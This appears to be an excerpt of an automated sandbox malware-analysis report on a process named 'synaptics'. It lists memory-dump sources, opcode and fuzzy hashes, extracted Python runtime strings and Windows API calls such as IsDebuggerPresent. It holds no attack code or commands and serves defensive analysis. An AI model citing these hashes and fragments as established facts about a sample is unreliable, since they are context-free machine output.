                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 32d0903f039451989dafadbb5614f537e43b686683d7c65019d46dd8860401c6
                                                                                                                                                                                                                                    • Instruction ID: 0142c8d3ea06d66ff3efdfa51cec479c0eddd1e2004aa42ea196e9d7da463dac
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32d0903f039451989dafadbb5614f537e43b686683d7c65019d46dd8860401c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CB09257B4000802D404145A38923BAA34293C403AE5801BADA0DCA780E913486E01C2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0efcb7756ffbc3078238b2fe454f33fe00af9dd8e184581e80e5124b92ba91b3
                                                                                                                                                                                                                                    • Instruction ID: 3ca396dc1992cb973aa5e2441432a7b2f4f87441719a28d9b62e9426b6fb91b0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0efcb7756ffbc3078238b2fe454f33fe00af9dd8e184581e80e5124b92ba91b3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFB01277B000040381109549F9420D6F342D7C107BB1442B7DD1DC1A00A623AC6E41C2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: % $ & $ * $ ** $ + $ - $ / $ // $ << $ >> $ @ $ ^ $unknown binary operator
                                                                                                                                                                                                                                    • API String ID: 0-3331271386
                                                                                                                                                                                                                                    • Opcode ID: d3abeebb743bc2fdb2d28f7b16378c1a3206ca2a888001a20743c6e5423ad036
                                                                                                                                                                                                                                    • Instruction ID: e43be4a60da05aef63bc2a9237f33580d223ee5cf1b9ed5d18b4cc8128b8944f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3abeebb743bc2fdb2d28f7b16378c1a3206ca2a888001a20743c6e5423ad036
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C45105B59043516FD3408B99D888B5773D0974933CF29C639EA684BBD2E275DC8A8FC1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9AE000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9AE000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9ae000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                                                                                                                    • Opcode ID: 2759b97316a09c42f0e16dad619c7e1fa74df6a6dbab2058f7afba7517fb601a
                                                                                                                                                                                                                                    • Instruction ID: 44d05fc9bcae3a303bf8b2431eee67e8f47085f425561aad11a9fa153aa67e53
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2759b97316a09c42f0e16dad619c7e1fa74df6a6dbab2058f7afba7517fb601a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A04AC32E011398FEB68DA65CC9979DF3F2AB88300F5582E9D45DB7250DA706E91CF84
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C976000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C976000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c976000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: =$A$F$a$bad argument type for built-in operation$f
                                                                                                                                                                                                                                    • API String ID: 0-1202118382
                                                                                                                                                                                                                                    • Opcode ID: 155299803ede5cae8eafd8970352824c29ef02ca2c80739204bc823816245e11
                                                                                                                                                                                                                                    • Instruction ID: 4b378d12cab5a95bda97eced658ac5da6a7b2f2519345bdd9ffce9e26ba8a14b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 155299803ede5cae8eafd8970352824c29ef02ca2c80739204bc823816245e11
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9225B7060B7429FD733CF18C4907A6BBEAEB82318F64465DD4A487A92D334D495CBB2
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 73A718F2
                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 73A719BE
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 73A719DE
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 73A719E8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2193732148.0000000073A71000.00000020.00000001.01000000.00000012.sdmp, Offset: 73A71000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_73a71000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                    • Opcode ID: 55217a8ab6832e0ef930e72f319420b20bab95c5a5bbe4d3efc01550c71e2b32
                                                                                                                                                                                                                                    • Instruction ID: d04a701bd39b05c6ee17f56c74f3f8d8602d45f97446bfca3e963c87588eba73
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55217a8ab6832e0ef930e72f319420b20bab95c5a5bbe4d3efc01550c71e2b32
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4931287590121C9BEB10DFA5C98A7CCBBF8EF08300F1041AAE40DA7250EB719A858F54
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 73D7AC3C
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 73D7AC45
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 73D7AC50
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 73D7AC57
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2201411217.0000000073D7A000.00000020.00000001.01000000.0000000B.sdmp, Offset: 73D7A000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_73d7a000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                                    • Opcode ID: bb7596d8c836c9a55e2a2ead9defb4faa7fc7fc04a1654195cca84041095ca66
                                                                                                                                                                                                                                    • Instruction ID: 18a9717b2ad5ef90270bc594d6ec18d2b108b15faa84dbc69dff45113fd0d856
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb7596d8c836c9a55e2a2ead9defb4faa7fc7fc04a1654195cca84041095ca66
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CD0EA73444208AFDA003BE6E90EB5A7B68AB09766F244410F78E87451DB7595218BE9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 73D7AC3C
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 73D7AC45
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 73D7AC50
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 73D7AC57
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2201411217.0000000073D7A000.00000020.00000001.01000000.0000000B.sdmp, Offset: 73D7A000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_73d7a000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                                    • Opcode ID: 110ea7760c1e86ea948032f1eafdfaa16a76f9e7a3421d85570afae0d91c4106
                                                                                                                                                                                                                                    • Instruction ID: 43f6ac9ad3f03149819ac1773fd5d9254fc89d7c6f2bf5f3e48a5b1b5e6b84af
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 110ea7760c1e86ea948032f1eafdfaa16a76f9e7a3421d85570afae0d91c4106
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75D0CA33448104AFCB003BE2E90EFAE3F24AB08326F244008F38E83452CB7544218BA9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • String has incomplete number of bytes, xrefs: 6C976939
                                                                                                                                                                                                                                    • Illegal char, xrefs: 6C9769DF
                                                                                                                                                                                                                                    • binascii.a2b_hqx() is deprecated, xrefs: 6C9767A1
                                                                                                                                                                                                                                    • binascii.rledecode_hqx() is deprecated, xrefs: 6C976E31
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C976000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C976000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c976000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Illegal char$String has incomplete number of bytes$binascii.a2b_hqx() is deprecated$binascii.rledecode_hqx() is deprecated
                                                                                                                                                                                                                                    • API String ID: 0-663426429
                                                                                                                                                                                                                                    • Opcode ID: f1d590220fb30735ef3475f962793a7783f64d326dd1408acd68dd865a15c749
                                                                                                                                                                                                                                    • Instruction ID: 15606d73d023b9fe7843627b4f7c8b0cd3cc081ca679108e25f9c7bb21e3a965
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1d590220fb30735ef3475f962793a7783f64d326dd1408acd68dd865a15c749
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1942D571A093418BD310DF28D941A9B77F5AFC5328F144A5DE898C7B90E731D949CBE2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB02000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB02000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb02000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: at least$at most$exactly$keyword
                                                                                                                                                                                                                                    • API String ID: 0-3936731004
                                                                                                                                                                                                                                    • Opcode ID: f597dffdf9aba593a1dc42a8e4fbae42f7f86316e5032b6a3cca839a4969a01b
                                                                                                                                                                                                                                    • Instruction ID: f15a203f0787370479b71661acdd5c77ec52ea1db261cb57cb1776b94bf8350d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f597dffdf9aba593a1dc42a8e4fbae42f7f86316e5032b6a3cca839a4969a01b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0128B71A08381DFD710CF59D890A1BB7E5EF88358F14492DE98997B10E732ED25CB92
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA83000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA83000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca83000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: @$@$replace string is too long
                                                                                                                                                                                                                                    • API String ID: 0-4038855488
                                                                                                                                                                                                                                    • Opcode ID: f2f2232680417b0dc5f603ed70819bddb493b2324216318569fb9743a36da060
                                                                                                                                                                                                                                    • Instruction ID: f3c54f7e91362aee85cd4900fb43afe03e0665cd1666923b11fdeb3a23c72283
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2f2232680417b0dc5f603ed70819bddb493b2324216318569fb9743a36da060
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43729B7160A3019FE700CF59C880A1ABBF2BF89318F58492DFC9697B50D735D889CB92
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C976000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C976000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c976000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Incorrect padding$VUUU$bad argument type for built-in operation
                                                                                                                                                                                                                                    • API String ID: 0-2478794383
                                                                                                                                                                                                                                    • Opcode ID: 2ebab502f1eed3e06fa1b5e8acac89f5aa91d7ca9ebf20b7000cc522bffadb9a
                                                                                                                                                                                                                                    • Instruction ID: 2f9014488d1868de32ccac482748cca59c65f7104c1d620f264be6a2414a5d20
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ebab502f1eed3e06fa1b5e8acac89f5aa91d7ca9ebf20b7000cc522bffadb9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C61F6759093819FD710CB68C401B9BBBE8AFD5318F04465DE9D8CBB81E735D846CBA2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA2D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA2D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca2d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: 0$int too large to format
                                                                                                                                                                                                                                    • API String ID: 0-2076621421
                                                                                                                                                                                                                                    • Opcode ID: df452341a4002972d13f78e5abcfe975ceb3be308c355203dba4f576d5b99fda
                                                                                                                                                                                                                                    • Instruction ID: 417639c4faefd03bdc5e0ee7daf37bbd65e70f0d81cd26b8bbb7b873000b9d04
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df452341a4002972d13f78e5abcfe975ceb3be308c355203dba4f576d5b99fda
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B22C4316093218FDB04CF28D4A075ABFE1EF85318F18596DE898DBB81D735D98ACB52
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: [
                                                                                                                                                                                                                                    • API String ID: 0-784033777
                                                                                                                                                                                                                                    • Opcode ID: 37c5d5e96c0021c439ecafe5aa7393ed3fdc27a01398d78e870715d3e4b294fd
                                                                                                                                                                                                                                    • Instruction ID: 028f08ccb5a38aa7114db1a30d0e97868f1861952eaf4ea53b919ab2bc84d24c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37c5d5e96c0021c439ecafe5aa7393ed3fdc27a01398d78e870715d3e4b294fd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1926F74A006058FD704CF29C590A9AB7F1FF49318F1586ADE86A8BB91EB71E847CF50
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA2D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA2D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca2d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Python int too large to convert to C long
                                                                                                                                                                                                                                    • API String ID: 0-1537553212
                                                                                                                                                                                                                                    • Opcode ID: a7a0bb03073ee89fa3c711c5483cae895bc64e997f4961974c217860b8735fbc
                                                                                                                                                                                                                                    • Instruction ID: 31368b7feb5b364461661a32817a3055178f55cf3e9b117f4943b2f5619c32d1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7a0bb03073ee89fa3c711c5483cae895bc64e997f4961974c217860b8735fbc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77328B71A083118FC704CF29D99055AB7F1BF89324F189A2EE99DCB790D734E985CB82
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • maximum recursion depth exceeded during compilation, xrefs: 6CAE0923
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: maximum recursion depth exceeded during compilation
                                                                                                                                                                                                                                    • API String ID: 0-1437289943
                                                                                                                                                                                                                                    • Opcode ID: ea8ceb5331402c4fbff8bdb54972fe96fd3b7817b2c558609fe667d295d13c94
                                                                                                                                                                                                                                    • Instruction ID: a40a91d81ecbab0b867faf43804e8850f4c1cc7700c2a2b51621dcc19235e109
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea8ceb5331402c4fbff8bdb54972fe96fd3b7817b2c558609fe667d295d13c94
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8E1A2747053428FE704CE65D9D0A5BB3E5AF89248B18402DEC55DB751EF30EC89EBA2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                    • API String ID: 0-3993045852
                                                                                                                                                                                                                                    • Opcode ID: 810349aecfe59ac51729ea3590b3e4d4256c4adc1a8175f1ae23aab159dda72e
                                                                                                                                                                                                                                    • Instruction ID: 62c6b72e53f95eecf1e0b5f8abcf2f437b640b51ff2a1796d4e793f3601d0239
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 810349aecfe59ac51729ea3590b3e4d4256c4adc1a8175f1ae23aab159dda72e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61E16EB16045818BC715CF19C984AA9B7F2EF91315F0C43A8F8A88BF52D774E9C6C7A1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C99D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C99D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c99d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: path
                                                                                                                                                                                                                                    • API String ID: 0-190089999
                                                                                                                                                                                                                                    • Opcode ID: 8114584c10507d78bc56928d7c4e8c2720597c2e9733ebf4f09a3c050c0c20d6
                                                                                                                                                                                                                                    • Instruction ID: d2a71e4972db5e808fc977826d3a21a163b08440b08ad83f9c314fd4a8d025fe
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8114584c10507d78bc56928d7c4e8c2720597c2e9733ebf4f09a3c050c0c20d6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1E1E171A097419FD700CFA9C841BAB77B5AF95328F144B2CE9A4C7A90E731E987C781
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • join() result is too long for a Python string, xrefs: 6CA84555
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA83000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA83000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca83000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: join() result is too long for a Python string
                                                                                                                                                                                                                                    • API String ID: 0-3415320053
                                                                                                                                                                                                                                    • Opcode ID: 0d5fa7c6af99398bd002c6652aee0512d1da0a576c2e68289068541a1ef125e6
                                                                                                                                                                                                                                    • Instruction ID: 53b25101411ff892af19101f7522fec69862b3c9c64f42b664ef67d75d11aaa7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d5fa7c6af99398bd002c6652aee0512d1da0a576c2e68289068541a1ef125e6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13D1F571A063028FD704CF18C8A0B6AB7E9FF85718F18466DE9689BB91D730DD85CB91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA2D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA2D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca2d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 24fd212e4eb2ef6f66a5d4c79ef74daba45865459a6945e4d62cd32f7f696a70
                                                                                                                                                                                                                                    • Instruction ID: a0044431bdc3a206e7d6eec79ce30d4d4ec2af0658cbbc2c97702c017fd116a1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24fd212e4eb2ef6f66a5d4c79ef74daba45865459a6945e4d62cd32f7f696a70
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9528D71A093218FD714CF18C980A5ABBF1FF89318F2D4A2DE89597B51D735E885CB82
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA2D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA2D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca2d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 688ec725fd6a5ae94b4bb5ca6ce8ac7a2dcd3d339a0c7cad039a840b8ac1e2aa
                                                                                                                                                                                                                                    • Instruction ID: 1511c13332828914d6227540a57abf8ed4f4f3f76bfb1de30e688f78ce3d4713
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 688ec725fd6a5ae94b4bb5ca6ce8ac7a2dcd3d339a0c7cad039a840b8ac1e2aa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31426C71A09211CFD304CF19DA50A5AB7F0BF85728F28561CE8A9C77A0E731DD86CB92
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 82169ff70eaf1716dd470bf9c13c1a98d98548ca2eebc689c33a742255b2d491
                                                                                                                                                                                                                                    • Instruction ID: ff64b33e62df3d1a440edc60c099be50ceaf8731422c9f4980a8f779d3eda67e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82169ff70eaf1716dd470bf9c13c1a98d98548ca2eebc689c33a742255b2d491
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19222CB19093056FD7019F34CE80B5BB6E8BF49708F00463AF964E2B51E731DA66C79A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 946230d32f50e96e0b319a49f1079ac73cc0da4846aab28d0d41ef77e7b55811
                                                                                                                                                                                                                                    • Instruction ID: d821473e6e9306f5310209de99f237d0436f3f2072a6ed05639d02f50904a142
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 946230d32f50e96e0b319a49f1079ac73cc0da4846aab28d0d41ef77e7b55811
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20128D716052018FD714DF29C580A5AB7E1FF8831CF1986ADE8A99B741EB31E887CB91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dc7010b4784ddcafac354abe23221de295ed26905abfc6286cee4a5149e1b1dc
                                                                                                                                                                                                                                    • Instruction ID: 52dce7a631e3f4ca81d4e83ff4bda9578c0bd15d6e61eaa84cca69f926bf6729
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc7010b4784ddcafac354abe23221de295ed26905abfc6286cee4a5149e1b1dc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DF15971A0A304BBEB515F20CD81F9B3995AF49708F004475FE68A9B92E771C019D7AF
                                                                                                                                                                                                                                    Memory Dump Source
